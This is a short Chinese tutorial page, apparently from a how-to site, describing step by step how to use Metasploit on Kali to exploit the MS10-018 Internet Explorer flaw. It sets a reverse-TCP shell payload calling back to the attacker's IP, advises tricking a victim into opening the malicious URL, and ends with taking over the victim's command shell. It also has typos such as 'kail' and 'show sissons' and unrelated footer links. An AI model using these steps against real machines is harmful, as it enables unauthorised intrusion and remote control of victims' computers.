kail利用msf对MS10-018漏洞进行渗透测试

 时间:2026-02-13 09:05:25

1、打开metasploit工具,等待工具启动。键入search ms10-018

kail利用msf对MS10-018漏洞进行渗透测试

2、use  exploit/windows/browser/ms10_018_ie_behaviors

应用模块

kail利用msf对MS10-018漏洞进行渗透测试

3、安装一个反向链接工具

set payload windows/shell/reverse_tcp

kail利用msf对MS10-018漏洞进行渗透测试

4、设置服务器地址 为攻击者自身ip,运行show options 显示选项

set srvhost 攻击者ip 设置服务提供者ip

set lhost 攻击者ip

show options查看选项

kail利用msf对MS10-018漏洞进行渗透测试

5、显示可以被利用的操作系统

kail利用msf对MS10-018漏洞进行渗透测试

6、执行恶意代码,会生成一个一个URL,想方设法让被攻击者打开。比方说内嵌在网页中,在这里我们就直接在IE内打开这个URL

kail利用msf对MS10-018漏洞进行渗透测试

7、当攻击者打开该URL时,IE卡死,崩溃

kail利用msf对MS10-018漏洞进行渗透测试

8、此时,界面会显示中招的主机

kail利用msf对MS10-018漏洞进行渗透测试

9、执行show sissons  查看会话

kail利用msf对MS10-018漏洞进行渗透测试

10、执行sessions -i 会话号 成功获取到被攻击者cmd

kail利用msf对MS10-018漏洞进行渗透测试

11、此时被攻击者,IE卡死,崩溃,攻击者拿到了被攻击者的权限,为所欲为。

此时就像在xp上一样打开cmd执行命令

kail利用msf对MS10-018漏洞进行渗透测试

  • 债转股如何操作
  • 快速建立免费的企业亚博官网
  • 韩非子名言名句有哪些
  • PS如何制作火焰效果?
  • 狗枸泡水的注意事项
  • 热门搜索
    质疑的意思 点差什么意思 螳螂捕蝉黄雀在后的意思 生平是什么意思 祝福孩子成长的话 什么小说网站比较好 birth是什么意思 做月子能吃什么 bonobo什么意思 本色的意思